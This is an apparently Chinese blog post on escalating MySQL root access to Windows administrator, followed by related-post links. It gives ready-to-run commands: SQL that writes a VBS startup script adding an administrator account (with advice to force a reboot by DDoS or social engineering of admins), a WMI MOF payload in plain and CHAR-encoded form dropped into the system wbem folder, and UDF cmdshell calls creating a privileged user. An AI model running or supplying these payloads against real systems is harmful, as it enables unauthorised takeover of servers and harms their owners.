一般是root权限,知道mysql root权限,root账号密码

启动项提权:
原理:利用高权限的root写入一个vbs脚本到启动项,再通过一些方法如ddos,社工管理员之类的方法来让服务器重启,运行脚本,达到提取目的
1、查看我们进入数据库中有些什么数据表
mysql>show tables;
默认的情况下,test中没有任何表的存在。
以下为关键的部分
2、在TEST数据库下创建一个新的表;
mysql>create table a (cmd text);
好了,我们创建了一个新的表,表名为a,表中只存放一个字段,字段名为cmd,为text文本。
3、在表中插入内容
mysql>insert into a values (“set wshshell=createobject (“”wscript.shell””)”);
mysql>insert into a values (“a=wshshell.run (“”cmd.exe /c net user 1 1 /add””,0)”);
mysql>insert into a values (“b=wshshell.run (“”cmd.exe /c net localgroup Administrators 1 /add””,0)”);
注意双引号和括号以及后面的“0”一定要输入!我们将用这三条命令来建立一个VBS的脚本程序!
4、好了,现在我们来看看表a中有些什么
mysql>select * from a;
我们将会看到表中有三行数据,就是我们刚刚输入的内容,确认你输入的内容无误后,我们来到下一步
5、输出表为一个VBS的脚本文件
mysql>select * from a into outfile “c://docume~1//administrator//「开始」菜单//程序//启动//digo8.vbs”;
6.重启即可!

Mof提权:
mysql mof漏洞介绍:
http://www.exploit-db.com/exploits/23083/
http://www.exploit-db.com/sploits/23083.zip

mof文件内容为:

#pragma namespace(“\\\\.\\root\\subscription”)

instance of __EventFilter as $EventFilter
{
EventNamespace = “Root\\Cimv2”;
Name = “filtP2”;
Query = “Select * From __InstanceModificationEvent ”
“Where TargetInstance Isa \”Win32_LocalTime\” ”
“And TargetInstance.Second = 5”;
QueryLanguage = “WQL”;
};

instance of ActiveScriptEventConsumer as $Consumer
{
Name = “consPCSV2”;
ScriptingEngine = “JScript”;
ScriptText =
“var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;
};

instance of __FilterToConsumerBinding
{
Consumer = $Consumer;
Filter = $EventFilter;
};

效果就是添加一个用户admin密码admin;

select char(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,108,111,99,97,108,103,114,111,117,112,32,97,100,109,105,110,105,115,116,114,97,116,111,114,115,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;

效果就是添加一个用户admin密码admin; 管理组

SELECT CHAR(35,112,114,97,103,109,97,32,110,97,109,101,115,112,97,99,101,40,34,92,92,92,92,46,92,92,114,111,111,116,92,92,115,117,98,115,99,114,105,112,116,105,111,110,34,41,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,69,118,101,110,116,70,105,108,116,101,114,32,97,115,32,36,69,118,101,110,116,70,105,108,116,101,114,13,10,123,13,10,32,32,32,32,69,118,101,110,116,78,97,109,101,115,112,97,99,101,32,61,32,34,82,111,111,116,92,92,67,105,109,118,50,34,59,13,10,32,32,32,32,78,97,109,101,32,32,61,32,34,102,105,108,116,80,50,34,59,13,10,32,32,32,32,81,117,101,114,121,32,61,32,34,83,101,108,101,99,116,32,42,32,70,114,111,109,32,95,95,73,110,115,116,97,110,99,101,77,111,100,105,102,105,99,97,116,105,111,110,69,118,101,110,116,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,87,104,101,114,101,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,32,73,115,97,32,92,34,87,105,110,51,50,95,76,111,99,97,108,84,105,109,101,92,34,32,34,13,10,32,32,32,32,32,32,32,32,32,32,32,32,34,65,110,100,32,84,97,114,103,101,116,73,110,115,116,97,110,99,101,46,83,101,99,111,110,100,32,61,32,53,34,59,13,10,32,32,32,32,81,117,101,114,121,76,97,110,103,117,97,103,101,32,61,32,34,87,81,76,34,59,13,10,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,65,99,116,105,118,101,83,99,114,105,112,116,69,118,101,110,116,67,111,110,115,117,109,101,114,32,97,115,32,36,67,111,110,115,117,109,101,114,13,10,123,13,10,32,32,32,32,78,97,109,101,32,61,32,34,99,111,110,115,80,67,83,86,50,34,59,13,10,32,32,32,32,83,99,114,105,112,116,105,110,103,69,110,103,105,110,101,32,61,32,34,74,83,99,114,105,112,116,34,59,13,10,32,32,32,32,83,99,114,105,112,116,84,101,120,116,32,61,13,10,32,32,32,32,34,118,97,114,32,87,83,72,32,61,32,110,101,119,32,65,99,116,105,118,101,88,79,98,106,101,99,116,40,92,34,87,83,99,114,105,112,116,46,83,104,101,108,108,92,34,41,92,110,87,83,72,46,114,117,110,40,92,34,110,101,116,46,101,120,101,32,117,115,101,114,32,97,100,109,105,110,32,97,100,109,105,110,32,47,97,100,100,92,34,41,34,59,13,10,32,125,59,13,10,13,10,105,110,115,116,97,110,99,101,32,111,102,32,95,95,70,105,108,116,101,114,84,111,67,111,110,115,117,109,101,114,66,105,110,100,105,110,103,13,10,123,13,10,32,32,32,32,67,111,110,115,117,109,101,114,32,32,32,61,32,36,67,111,110,115,117,109,101,114,59,13,10,32,32,32,32,70,105,108,116,101,114,32,61,32,36,69,118,101,110,116,70,105,108,116,101,114,59,13,10,125,59) INTO dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;

现在默认它还是会过5s添加一次用户,解决方法就是:
第一 net stop winmgmt 停止服务,
第二 删除文件夹:C:\WINDOWS\system32\wbem\Repository\
第三 net start winmgmt 启动服务

UDF提权,推荐暗月的一款脚本

当然也可以dos下直接连接数据库,执行下列语句,方法大同小异
create function cmdshell returns string soname ‘udf.dll’
select cmdshell(‘net user iis_user 123!@#abcABC /add’);
select cmdshell(‘net localgroup administrators iis_user /add’);
select cmdshell(‘regedit /s d:web3389.reg’);
drop function cmdshell;
select cmdshell(‘netstat -an’);

我还是那个帅气的某某

qq2553083572

mysql提权常用方法。 hack某某的更多相关文章

  1. MYSQL提权方法

    cve-2016-6662 MYSQL提权分析 MySQL <= 5.7.15 远程代码执行/ 提权 (0day) 5.6.33 5.5.52 Mysql分支的版本也受影响,包括: MariaD ...

  2. MYSQL提权总结

    最近在测试一个项目,遇到了MYSQL数据库,想尽办法提权,最终都没有成功,很是郁闷,可能是自己很久没有研究过提权导致的吧,总结一下MYSQL提权的各种姿势吧,权当复习了.关于mysql提权的方法也就那 ...

  3. 转载:windows的mysql提权方式

    mysql提权语句归纳如下: 一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: create function cmdshell returns string soname ...

  4. mysql提权笔记

    最近小菜遇到mysql提权,总是会搞错,就记记笔记吧!以后方便用 先说手工吧! mysql<5.0,导出路径随意:5.0<=mysql<5.1,则需要导出至目标服务器的系统目录(如: ...

  5. win环境下使用sqlmap写shell + MYSQL提权(默认就是system权限)

    今天在来一个mysql提权 (也可以说是默认system权限提的) 在被黑站点找到一个站   先教拿shell是有注入漏洞的 有可能是root权限的注入点 可以确定是有注入漏洞的 也得到了 物理路径 ...

  6. MYSQL提权的各种姿势

    一.利用mof提权 前段时间Kingcope大牛发布了mysql远程提权0day,剑心牛对MOF利用进行了分析,如下: Windows 管理规范 (WMI) 提供了以下三种方法编译到 WMI 存储库的 ...

  7. 【技巧总结】Penetration Test Engineer[5]-Operating System Security(SQL Server、MySQL提权)

    4.数据库安全基础 4.1.MSSQL 数据库角色权限 sysadmin:执行SQL Server中的任何动作 db_owner:可以执行数据库中技术所有动作的用户 public:数据库的每个合法用户 ...

  8. MySQL提权之user.MYD中hash破解方法

    经常在服务器提权的时候,尤其是windows环境下,我们发现权限不高,却可以读取mysql的datadir目录,并且能够成功下载user.MYD这个文件.但是在读取内容的时候,经常会遇到root密码h ...

  9. mysql 提权总结

    1.MOF提权 简单的说mof就是系统内部的一个程序,每隔一定时间系统就会以root权限去执行,我们将其替换然后执行我们的而已攻击代码.此举称之为mof提权. 以下便是脚本: #pragma name ...

随机推荐

  1. iOS 渐变提示。错误弹出提示 几秒自动消失

    //事例 CGRect alertFarm = CGRectMake(,,,); [self noticeAlert:_bgView withNoticeStr:@"登录成功" w ...

  2. ubuntu 16.04 源代码安装libusb

    libusb是一个跨平台的usb通讯库:https://libusb.info/ 在ubuntu16上安装 1. 首先安装 libudev-dev sudo apt-get install libud ...

  3. ubuntu sudoers配置错误

    ubuntu16 sudoers配置错误,普通用户无法使用sudo了,且root帐户也没启动. 重启,按住esc,选择恢复模式,选择root模式 mount -o remount rw / 修改文件至 ...

  4. android mat 转 bitmap

    Bitmap bmp = null; Mat tmp = new Mat (height, width, CvType.CV_8U, new Scalar(4)); try { //Imgproc.c ...

  5. SNF软件开发机器人平台2018-发展升级履历-零编程时代

    一.SNF软件开发机器人产品白皮书 二.SNF开发机器人教程:链接:https://pan.baidu.com/s/1Qpomg11c_1b1NKY5P7e4Bw 密码:jwc3 三.SNF软件开发机 ...

  6. eclipse中项目jdk1.8刷新下就变成1.5的解决办法

    https://blog.csdn.net/qq_32814555/article/details/82803017 ***************************************** ...

  7. 【Linux】解决"no member named 'max_align_t'

    编译遇到错误: /usr/bin/../lib/gcc/x86_64-linux-gnu/5.4.1/../../../../include/c++/5.4.1/cstddef:51:11: erro ...

  8. Win10连接远程桌面的时候提示您的凭证不工作该怎么办?

    Win10连接远程桌面的时候提示您的凭证不工作该怎么办?Win10连接远程桌面的时候,提示“您的凭证不工作”.原有保存的远程帐号密码无法使用,导致远程登录系统失败.我这里总结下自己解决的方法,分享给大 ...

  9. 光纤网卡、HBA卡和RAID卡的区别(图)

    原文地址:http://wenku.baidu.com/link?url=suuaTXbO_HXeNvuEfi8_RhRAfhQdoZ854lEK4K6LKprgQwwuxA-i3ItwPn7BBBK ...

  10. go语言字符串的连接和截取

    字符串的连接: https://studygolang.com/articles/12281?fr=sidebar 字符串的截取: https://studygolang.com/articles/9 ...